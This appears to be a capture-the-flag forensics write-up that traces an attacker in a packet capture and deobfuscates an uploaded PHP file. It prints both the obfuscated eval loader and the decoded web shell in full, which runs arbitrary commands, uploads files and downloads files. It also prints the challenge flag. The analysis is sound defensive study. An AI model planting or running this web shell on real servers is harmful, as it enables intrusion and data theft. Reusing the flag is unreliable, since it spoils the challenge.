9 minutes to read
We are given a PCAP file (challenge.pcap
) with a lot of network packets:
Finding the attack vector
First of all, let’s filter by HTTP to read only high-level network packets:
The attacker is poking around with the website. For instance, they are trying to use POST parameters:
If we go to the end of the packet capture, we will see that the attackers are executing system commands:
In the above ls
command, we see a file called galacticmap-php
that looks suspicious. In fact, going back on HTTP requests we see a lot of requests ending in galacticmap.php
that give a 404 error. Plus, there is a User-Agent
header that shows Wfuzz/3.1.0
This actually means that the attacker uploaded a malicious PHP file called galacticmap.php
and is trying to figure out in what directory it was stored. Thus, he must have used a command like this:
wfuzz -w <wordlist> -u --hc 404
There is a POST request where the attacker uploads the galacticmap.php
In Wireshark, clicking in “Show Packet Bytes” will output the following window, with the full PHP script:
PHP deobfuscation
The code is obfuscated, but at the end it calls eval
$pPziZoJiMpcu = 82;
$liGBOKxsOGMz = array();
$iyzQ5h8qf6 = "" ;
$iyzQ5h8qf6 .= "<nnyo ea\$px-aloerl0=e r\$0' weme Su rgsr s\"eu>\"e'Er= elmi)y ]_'t>bde e e =p xt\" ?ltps vdfic-xetrmsx'l0em0 o\"oc&'t [r\"e _e;eV.ncxm'vToil ,F y";
$iyzQ5h8qf6 .= "<r s -<a \"op r_P< poeeihaeild /ds\"se4bsxao1: r]du ;e\$'o,t dn\n)i\$'me'maoate{e I!lb>'u btde .sr ege/ han:t";
$iyzQ5h8qf6 .= "elrlenjl t>( 0'eCdd0 l et0\n'seu u it ;e_ dc>ulUd'T\nxe\$L<er<.l oh>c ii aert pdt iai(ed.QiJr\n\$i0; 0\"e0' d= ex ].xp\$r re \nwSn'u<lup ]o iluE/=>b\$t r>\n";
$iyzQ5h8qf6 .= "h rxn ltmb \n'-aodd') bubaa\nff0 i0] )- [ &\"4 ==e[wn (r #iEa tftelF)U sspSb\"'rd dO o e_t ppso \n]DpneaC;aoesvp\ni( }f0 & ' \"( ]0 =sc'o \$s #nRmaeoi=oi)p te";
$iyzQ5h8qf6 .= "l[>c;>ia ew agP aw(d i;ep:rto\nnor/a/<l )\n( = ?;\$r\$0 0 'puwr\$\$d\" fgVeu'rp'al l s o'<o\n<rs rn \" leeetu\$y f\nsl (en dtyjS3?e\$ ) 0 \ngem0= xrtrlsdi; l E=t>ma\"d";
$iyzQ5h8qf6 .= "e{o iafbl\nb. }ee < ptrchid> cia''t s qc.p)m{ \$ (0' rao0 ) 'ieid;ir\n adR'o\\ r.''\na ifdiro >'\$\ndr<t apmh(di\" ( rctE)";
$iyzQ5h8qf6 .= "e mtlur3h;o m{\$2x odd0( )n't[\nr) gi[dcnat\$ d n Dl>r R k}\"<tr twso\$(r; i iatx;n iriei.p\nd\$ o m0' u\"e1\$\$ ";
$iyzQ5h8qf6 .= " t]e'} ) } r'io\"c/_in ' (ie': e&e\n>/b> hu( df)\n s ptap\nt nabrp6\n et d\$o0 p] )ogi?f)'r\n= \n=ePrm;tfGda";
$iyzQ5h8qf6 .= " ]e\"mrT;r s&ye\nto\" (i\$\"ii e s tici - ipryt/\n y etd): [ & wrf (;]e\n { cH'p\nioE=m [c.oeo\ne u c hd; \$dd<rl.c e iohr L fca/ jf &p ye ";
$iyzQ5h8qf6 .= "\"= ?no('\"\n,a\n\$\n HtP leorT'e 'h\$vcU d l'=h >y\n d(it.e h t onme e idr1-su e &p ?' e 0 eu t% d\$_ To_vecnm[f= nouetp \" t.";
$iyzQ5h8qf6 .= ">o \n> eifrd'o\"o ( n/es n eny.-/n 0=e e& - x(0'rp\$'1 \$'dP BrSath=-'i' a p_ol > \$ \n cri)>/w< \$i:on: g ";
$iyzQ5h8qf6 .= "d. 1>bc x'l0= ''\$e\$0x[[m s g]iO {yEleo'ddls m\"luro E}o_\$\"< < h.l <'n/\" _f ct t c-2\not 2dsx'0w;gcm0''\"o:% r,rS W Lu= \"aieu\$e<opya r\nfG";
$iyzQ5h8qf6 .= "v<t ? o'< G Ft;0 h Co-.<oi 0'eAs0'\nruo2 eed 1 o T 0\"Fe'\".trTbu'bal)d r\n Eabh p /o \$rd/ E(ie ' :eSm>2stoi0; 0'4 otd):xxe's u\$=[ ";
$iyzQ5h8qf6 .= " w '=o<\$a'omp]rdo)' o}cTlre h \"'w\"hv(>t Tfltf) xS/\n/csnf0 i0;0: uee ee T% pw ' \$_.]\"f/_']Uil)>Da ] r\no[u>a p <.n<ra\$\\a [ie-i; 'i b<jrt ( }f0 0 ";
$iyzQ5h8qf6 .= "p\" ?'cc&'1 [o\$d dR ..ffS>.pto;<id{[} \nm'e\"d \n t\$e/eldnb 'l sl\n t-osqirp )\n( })' []& -uu ;s\$'r_ii iO\$\"\$'oE";
$iyzQ5h8qf6 .= "\\\"l'a\nbre\n' uimc);> fidvrtfui\"l deTte .;-ocupar\$ )\n - \" ''tt0\n\"selGrf rtd'd rRn'o>d red nepfam \n\n<o";
$iyzQ5h8qf6 .= "f>a(d=er;e o_rrn h \n>tretpim{ \$ ?' w=0w;eex ,.xdE' _i iamV\"/a\"D >c_ all nd{? tr <l\$>').\n> weaea ef \nsir .no ";
$iyzQ5h8qf6 .= "m{ ; r 0'\n'\"2 =e[T](\$=Armru>E;>d;i <tf mso(d'\n> he(aud\\\" ' \" nxnam ai <tpysmtd\$ o '\n i(0 ]]0 \$sc'[;if _ e.t\"R\n '\nr boi eeai ] \n >ai ein../ ; lisme ";
$iyzQ5h8qf6 .= "dl lrt.riPet d\$ r \$t\$0: = 0 opuw'\nsi'D.t\"o;[e\">ee rl ' dse, \n Pcsh)r\" ' \n osf'= ee ia mcne y et ' gem4 == wrtrd}_l.a h f\n'c;\\cc sye ]{isx <";
$iyzQ5h8qf6 .= " eh_r .;\$\". \n ate)\" rs npsi=.r&p y r\"o)' ' ) nieii\nfe/Y\"o/oePh\nnht t.( .\nnee\$ t r de.'\n_'\$ \n dsr;' (i k/rn\"jm e &p : o]d - x( en'tr\$i '}<d>ccHoe<o";
$iyzQ5h8qf6 .= "o y\"\$ ' gtcc a<m(if / S>v ? '('\n. 'z 3c.hss0=e e u e?' '\$\$ rt]e'fl=;\n/=\"uhP cb ril._ (um bti\$r=\"' E\"a > ]\$) b Pe r.=jt\"(x'l0=e' p= ; )gw\$[f)']ie \n\$h";
$iyzQ5h8qf6 .= "';so_\"hr\"yfe<F u f\$td lrsd('/. R.l \n )f; a r(}e3\"st>\$1csx'l- [ &'\n ros'(;];l(\$}d2G\n> S<o>< =/I p i_ir e>sir\"'\$ V u}\n )i\n s a\$\nl.h\"p<f0'e8l";
$iyzQ5h8qf6 .= "s' \"( r i?or=r\"\n,\ne\$d\ni>Ee\\\"Ei </=('bL l lGoe \nire.>v E\$e\n\n l ehgf}=6t>:/i0; 0'e;\$r\$0' f ulse% i di\$r\"Tcn\\Ln\"id fc>E o eEns c osa \"a Rv) \n {e";
$iyzQ5h8qf6 .= " nemi\n\"/t</sl0 i0; \noem0 ('pdpa1 \$f=irds;'h<nFp<ni\$io<S a T:u l n l\$.l [a) < \n) aaal\nscp//ce }f0 \$ wao0: s[[rds w r;i \n>o";
$iyzQ5h8qf6 .= "i<'uipvdll/[ d '[ l a sap_ u 'l[ / ) md:e?tsssmr))\n( }t ndd1 \$''\"i'% o(')\nr=e\" nb]tnu>ieob' e .'<t s <saS\$e}Pu";
$iyzQ5h8qf6 .= "n d ee )>ys:cai )\ny e\"e0' m een]1 ri') c;\"pr. pt\"r_rrfed \$c/) s / tEv)\nHea i { (rp)\nl//rxp{{ \$ p r] )- o:xxt,s ls; =sh\n<u>\"tu";
$iyzQ5h8qf6 .= " ;.e:>ic umb; = t\$hRa) P m v \n \$(u;\neb/ict\n m{ e [ & ' d eef % ds\n{ coeit\\'ytt\n'xr<lhs pd>\n \" hk(Vl[ _.e > f'b\n<soapd> \$ o = \"=";
$iyzQ5h8qf6 .= " ?;\$e'cc(\$1 [ei\n ra cn n p y\n/ie/eou l'< et >e\$Eun S ] \n iCl hhojtn\n t d\$ ' e 0 \nw Suu\"os\$'tf en\"hpt<metpi'sdbT c o]b ca";
$iyzQ5h8qf6 .= "<\nydRea E\" e< hlai teta>.\n y et u x(0' o&'tt%w\"se( ad\\ouyde=yef.t'ro'c a)r hbt i[ m L<.c/ eecc mesx\nb< p y '\$e\$0x r ;ee1n,.x\$( lin tpit'p";
$iyzQ5h8qf6 .= "= bs>>U<e d)> olh =r'.e F/\"hh \$ a)h' ltt.\nod e &p ;ocm2' l0\n'\"se =e_\$ pr<\" evhhe'(a(E\"pbseD \" e> >.P ] 'a<ot f hd.e) >\"r";
$iyzQ5h8qf6 .= "g<oi =e e \nwuo0 dx ]]\"r\$scPd a(b<t= oi=sis\$r;lrsci{; \" N 'H\" ]>/ m i ee'-; \n ao!tv 'l0=e ntd): [8 = ,[gpuOi t\$riy'cdd'useur\no>fhr\n\n \$ta \$/P<.e <t\"";
$iyzQ5h8qf6 .= "l l ar\"C\n <hpo-s psx'l eee \"0 == 'rrtSr hd>npsl=dfbsnpo a<uoe vam v'_/ l./d<> e d('o !r.g-tc\$'e6-s r\" ?' e0 ' \$woieT (i<peua'eime";
$iyzQ5h8qf6 .= "alr dbl c fabe<a.Sa\"s t>/ e')n -eml rlm; 0'e []& - x x(trun'[= \$rfu=bsPnlitmo. 'rl't oll</l\$E><e\"d<t = rC;t -fieLaao i0; \" ''\$e) ";
$iyzQ5h8qf6 .= "'\$yipt]'= d)ot'msO'et(ea ]>y<o rue/tuvL</ ?>tr (o\nr =naapsd}f0 i w=0w;wc )wpt[f)d i;r ti=S ''\$(dF [< br ee-treaF/t{d<d> \$h";
$iyzQ5h8qf6 .= "'n o L\".ptcse\n( }f r 0'\nou\$ oee'(;iN r\nmtet'Tn _\$Di 'biry a hh>)l'td\not>\" _eCt l rahcied= )\n( i(0 rtoi?r)'r\"\nrU e.e yx'n'anvP_il t>n>. c";
$iyzQ5h8qf6 .= "\\o>\n u]d> wd ; Gaoe : ettsssn\"= \$ \$t\$4: lewf l;]e% 'L c'capt a maaOFre mF <' hnv\n {e >< n>\"\n Ednn aets.t.c m{ \$oem0 d\"n('d\n,a1 ]L h/hce'vveemlS";
$iyzQ5h8qf6 .= "Ie }pi'b<ee <e \n).<t l\" } Tett m dsp\"c cof o mw\"o)' []e s[ ds ) o'ot= abn=euTLca\n_l.r/cx(br ) td o..\n [re- u ft:>oconi d\$ on]d - ";
$iyzQ5h8qf6 .= "\" r\$'' \$'% )oe . i'nlac'=e[Etl ne\$>bhe\$r )\"d> a e '(nD s i /\nmomtl et de e?' w=[m e o]1 rc\$\$\"ohaurtd'='Sor a d<>occ>t < ?> dppc d";
$iyzQ5h8qf6 .= "'ti t lc/\n/m/ae y er= ; r \"o:x w,s { hfv<nime-yif's[re m'ib< (m\"a / {d\"\" =orh oC-s -heom<apbip &p [ &'\n i(ed e n % \n!oiah=de=fpriUu'ya e.r b\"'d;b t";
$iyzQ5h8qf6 .= " \ni. \"sio woTp re(ma!jionee e &\"( r \$t\$xe'c e\$1 i ll2'd='oe'lpbf)d '\$.sr<cr\nl h r . .in ";
for($i = 0; $i < $pPziZoJiMpcu; $i++) $liGBOKxsOGMz[] = "";
for($i = 0; $i < (strlen($iyzQ5h8qf6) / $pPziZoJiMpcu); $i++) { for($r = 0; $r < $pPziZoJiMpcu; $r++) $liGBOKxsOGMz[$r] .= $iyzQ5h8qf6[$r + $i * $pPziZoJiMpcu]; }
$bhrTeZXazQ = trim(implode("", $liGBOKxsOGMz));
$bhrTeZXazQ = "?>$bhrTeZXazQ";
eval( $bhrTeZXazQ );
We can replace this last eval
by echo
, so that we print the PHP code that it was going to be executed:
$ php script.php
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="">
<!-- jQuery library -->
<script src=""></script>
<!-- Latest compiled JavaScript -->
<script src=""></script>
<div class="container">
function printPerms($file) {
$mode = fileperms($file);
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return $s;
$dir = $_GET['dir'];
if (isset($_POST['dir'])) {
$dir = $_POST['dir'];
$file = '';
if ($dir == NULL or !is_dir($dir)) {
if (is_file($dir)) {
echo "enters";
$file = $dir;
echo $file;
$dir = './';
$dir = realpath($dir.'/'.$value);
##flag = HTB{W0w_ROt_A_DaY}
$dirs = scandir($dir);
echo "<h2>Viewing directory " . $dir . "</h2>";
echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>";
echo "<input type='hidden' name='dir' value=".$dir." />";
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";
if (isset($_POST['submit'])) {
$uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']);
if (file_exists($uploadDirectory)) {
echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
} else {
echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';
if (isset($_GET['cmd'])) {
echo "<br><br><b>Result of command execution: </b><br>";
exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult);
foreach ($cmdresult as $key => $value) {
echo "$value \n<br>";
echo "<br>";
<table class="table table-hover table-bordered">
foreach ($dirs as $key => $value) {
echo "<tr>";
if (is_dir(realpath($dir.'/'.$value))) {
echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
else {
echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n";
echo "</tr>";
echo "</tbody>";
echo "</table>";
This is another PHP file that looks to be appended to the website and used to execute arbitrary system commands in the server.
What’s more important, the flag appears in the output above:
$ php script.php | grep HTB
##flag = HTB{W0w_ROt_A_DaY}